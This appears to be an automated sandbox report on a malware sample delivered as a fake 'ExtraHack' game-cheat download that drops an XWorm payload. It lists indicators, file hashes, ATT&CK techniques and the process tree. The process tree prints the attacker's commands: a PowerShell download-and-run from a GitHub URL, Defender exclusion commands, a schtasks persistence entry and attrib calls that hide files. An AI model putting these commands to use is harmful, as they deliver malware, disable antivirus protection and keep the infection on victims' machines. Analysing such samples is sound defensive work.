Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
21/08/2024, 14:30
Static task
static1
General
-
Target
view.html
-
Size
87KB
-
MD5
1ecc2aae3f2ab57f63bfef2db4e9d0fe
-
SHA1
45363e6c12b569f2ded8c107ed9a9efe3b3145f1
-
SHA256
bfc7a87ce5b4012413ce61c57cea0d144b772eb2d835c9a73f8b859625621035
-
SHA512
496299ba3fa0df366d98267137a6a12373ccd6501721fb8bd1abf02ea2861b7a7b985ddc574884a2d5197ed39fbe8c0340dde57bf99bf0f446abcad2924c0ddc
-
SSDEEP
1536:sLPVJkBpqJJtl2T9ykl++uglwCBorWZ+19P:MzkCZT
Malware Config
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/3296-229-0x00000000001B0000-0x000000000052C000-memory.dmp family_xworm -
Blocklisted process makes network request 2 IoCs
flow pid Process 59 1200 powershell.exe 60 1200 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 5992 powershell.exe 3388 powershell.exe 2680 powershell.exe 5644 powershell.exe 576 powershell.exe 5568 powershell.exe 1200 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk ChromeUpdater.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk ChromeUpdater.exe -
Executes dropped EXE 1 IoCs
pid Process 3296 ChromeUpdater.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\ProgramData\\Runtime Broker.exe" ChromeUpdater.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 18 IoCs
flow ioc 70 pastebin.com 72 pastebin.com 60 raw.githubusercontent.com 67 pastebin.com 74 pastebin.com 14 drive.google.com 66 pastebin.com 76 pastebin.com 77 pastebin.com 78 pastebin.com 71 pastebin.com 73 pastebin.com 80 pastebin.com 1 pastebin.com 3 drive.google.com 15 raw.githubusercontent.com 65 pastebin.com 68 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 20 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 3296 ChromeUpdater.exe 3296 ChromeUpdater.exe 3296 ChromeUpdater.exe 3296 ChromeUpdater.exe 3296 ChromeUpdater.exe 3296 ChromeUpdater.exe 3296 ChromeUpdater.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ChromeUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings msedge.exe -
NTFS ADS 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\ExtraHack Public Version (fix).zip:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\ExtraHack Public Version (fix) (1).zip:Zone.Identifier msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5912 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 39 IoCs
pid Process 4820 msedge.exe 4820 msedge.exe 2784 msedge.exe 2784 msedge.exe 6104 msedge.exe 6104 msedge.exe 3492 msedge.exe 3492 msedge.exe 1984 msedge.exe 1984 msedge.exe 5404 identity_helper.exe 5404 identity_helper.exe 5992 powershell.exe 5992 powershell.exe 5992 powershell.exe 2680 powershell.exe 2680 powershell.exe 2680 powershell.exe 1200 powershell.exe 1200 powershell.exe 1200 powershell.exe 3296 ChromeUpdater.exe 3296 ChromeUpdater.exe 5644 powershell.exe 5644 powershell.exe 5644 powershell.exe 576 powershell.exe 576 powershell.exe 576 powershell.exe 5568 powershell.exe 5568 powershell.exe 5568 powershell.exe 3388 powershell.exe 3388 powershell.exe 3388 powershell.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 5992 powershell.exe Token: SeDebugPrivilege 2680 powershell.exe Token: SeDebugPrivilege 1200 powershell.exe Token: SeDebugPrivilege 3296 ChromeUpdater.exe Token: SeDebugPrivilege 5644 powershell.exe Token: SeDebugPrivilege 576 powershell.exe Token: SeDebugPrivilege 5568 powershell.exe Token: SeDebugPrivilege 3388 powershell.exe -
Suspicious use of FindShellTrayWindow 43 IoCs
pid Process 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3296 ChromeUpdater.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2784 wrote to memory of 1444 2784 msedge.exe 80 PID 2784 wrote to memory of 1444 2784 msedge.exe 80 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 2476 2784 msedge.exe 81 PID 2784 wrote to memory of 4820 2784 msedge.exe 82 PID 2784 wrote to memory of 4820 2784 msedge.exe 82 PID 2784 wrote to memory of 1352 2784 msedge.exe 83 PID 2784 wrote to memory of 1352 2784 msedge.exe 83 PID 2784 wrote to memory of 1352 2784 msedge.exe 83 PID 2784 wrote to memory of 1352 2784 msedge.exe 83 PID 2784 wrote to memory of 1352 2784 msedge.exe 83 PID 2784 wrote to memory of 1352 2784 msedge.exe 83 PID 2784 wrote to memory of 1352 2784 msedge.exe 83 PID 2784 wrote to memory of 1352 2784 msedge.exe 83 PID 2784 wrote to memory of 1352 2784 msedge.exe 83 PID 2784 wrote to memory of 1352 2784 msedge.exe 83 PID 2784 wrote to memory of 1352 2784 msedge.exe 83 PID 2784 wrote to memory of 1352 2784 msedge.exe 83 PID 2784 wrote to memory of 1352 2784 msedge.exe 83 PID 2784 wrote to memory of 1352 2784 msedge.exe 83 PID 2784 wrote to memory of 1352 2784 msedge.exe 83 PID 2784 wrote to memory of 1352 2784 msedge.exe 83 PID 2784 wrote to memory of 1352 2784 msedge.exe 83 PID 2784 wrote to memory of 1352 2784 msedge.exe 83 PID 2784 wrote to memory of 1352 2784 msedge.exe 83 PID 2784 wrote to memory of 1352 2784 msedge.exe 83 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 5868 attrib.exe 3180 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\view.html1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd6fc93cb8,0x7ffd6fc93cc8,0x7ffd6fc93cd82⤵PID:1444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,8784434260869100255,3374469794882831186,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1960 /prefetch:22⤵PID:2476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1948,8784434260869100255,3374469794882831186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1948,8784434260869100255,3374469794882831186,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2584 /prefetch:82⤵PID:1352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,8784434260869100255,3374469794882831186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:12⤵PID:4556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,8784434260869100255,3374469794882831186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:12⤵PID:5652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,8784434260869100255,3374469794882831186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4588 /prefetch:12⤵PID:5916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,8784434260869100255,3374469794882831186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:12⤵PID:5644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,8784434260869100255,3374469794882831186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:12⤵PID:864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1948,8784434260869100255,3374469794882831186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6284 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:6104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,8784434260869100255,3374469794882831186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3640 /prefetch:12⤵PID:5772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1948,8784434260869100255,3374469794882831186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6628 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:3492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1948,8784434260869100255,3374469794882831186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4048 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,8784434260869100255,3374469794882831186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3044 /prefetch:12⤵PID:4808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,8784434260869100255,3374469794882831186,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1916 /prefetch:12⤵PID:3268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1948,8784434260869100255,3374469794882831186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6312 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,8784434260869100255,3374469794882831186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:12⤵PID:5276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,8784434260869100255,3374469794882831186,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6948 /prefetch:12⤵PID:1492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,8784434260869100255,3374469794882831186,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7120 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:2948
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3624
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4008
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4008
-
C:\Users\Admin\AppData\Local\Temp\Temp1_ExtraHack Public Version (fix) (1).zip\ExtraHack Public Version\ExtraHackInjector.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_ExtraHack Public Version (fix) (1).zip\ExtraHack Public Version\ExtraHackInjector.exe"1⤵PID:5000
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start F:\92593184.bat2⤵PID:3244
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K F:\92593184.bat3⤵
- Enumerates connected drives
PID:4176 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5992
-
-
C:\Windows\system32\chcp.comchcp 650014⤵PID:1268
-
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"4⤵PID:1348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath "C:\4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2680
-
-
C:\Windows\system32\attrib.exeattrib +h "Google Chrome" /s /d4⤵
- Views/modifies file attributes
PID:5868
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://github.com/sa2141414/NewRepository-32525/raw/main/DontLaunch1.exe' -OutFile ChromeUpdater.exe"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1200
-
-
F:\ChromeUpdater.exeChromeUpdater.exe4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3296 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'F:\ChromeUpdater.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5644
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ChromeUpdater.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:576
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Runtime Broker.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5568
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3388
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\ProgramData\Runtime Broker.exe"5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5912
-
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Google Chrome\ChromeUpdater.exe" /s /d4⤵
- Views/modifies file attributes
PID:3180
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
2KB
MD5d0c46cad6c0778401e21910bd6b56b70
SHA17be418951ea96326aca445b8dfe449b2bfa0dca6
SHA2569600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02
SHA512057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949
-
Filesize
152B
MD53e681bda746d695b173a54033103efa8
SHA1ae07be487e65914bb068174b99660fb8deb11a1d
SHA256fee5f7377e5ca213c1d8d7827b788723d0dd2538e7ce3f35581fc613fde834c2
SHA5120f4381c769d4ae18ff3ac93fd97e8d879043b8ec825611db27f08bd44c08babc1710672c3f93435a61e40db1ccbf5b74c6363aaaf5f4a7fc95a6a7786d1aced8
-
Filesize
152B
MD59f081a02d8bbd5d800828ed8c769f5d9
SHA1978d807096b7e7a4962a001b7bba6b2e77ce419a
SHA256a7645e1b16115e9afec86efa139d35d5fecc6c5c7c59174c9901b4213b1fae0e
SHA5127f3045f276f5bd8d3c65a23592419c3b98f1311c214c8e54a4dfe09122a08afb08ab7967b49bd413bc748ce6363658640bc87958d5e0a78974680a8f9beadf44
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize96B
MD57ff8c1afe999c739297a82eadd1dcbb4
SHA1280cebe393ffac4c3f4c9ae42b2f67a90d4c1b32
SHA2568167645c5a6d058dacf1d3deb0c6ad0bf7ba2668960cede339c5240047c641f5
SHA512d5d3f560d6848dc0c906948893d639cf63ce696a6e63db74963e3468c6a22fcc888a9d1c0bb66327d16facbb1d35cb23964b5ef2ce554308bd77aa2006bc97c9
-
Filesize
2KB
MD5ebda0bc04cd0635e58b64ce21e42f76d
SHA14b59593b371169059deb19fef164718769568898
SHA256a812f7a6ad6f5e32bff74e30de8ff637f63d368f14fcb90193264b03290d6262
SHA512334fcb334e546ab5736546ddc3a7660e20d9ac9b2e65b9cf24bfd3d5e9b90211e055a456afe0a16ad5319e70abd7fbf7f2e351e3baec5dac05a8b7db473e8319
-
Filesize
5KB
MD5fc763fb57e363b20a7f39d7fe1836aaa
SHA1f7812f93b1e847be22cec4d1010017da04f3367c
SHA256a14a9b2ac913b02b86f3e478b79de66c8cc65d469fe25ae0bfb8f7360519a793
SHA5122591cd75242cb27bbabcb330139f32576c68d79747294f40546bc8653c3916a74da17f41077283e1b3068e952efba9f5405560a50ed82f17ac97f146923ef885
-
Filesize
6KB
MD5f8224acc25e54a71893cce38cd343097
SHA1cb90962c4132cf59467884ccd0e15991e647d8fd
SHA256a7611cadb0661ca97a32341566d208468b79e2041125d0a1f2c98691afa853c2
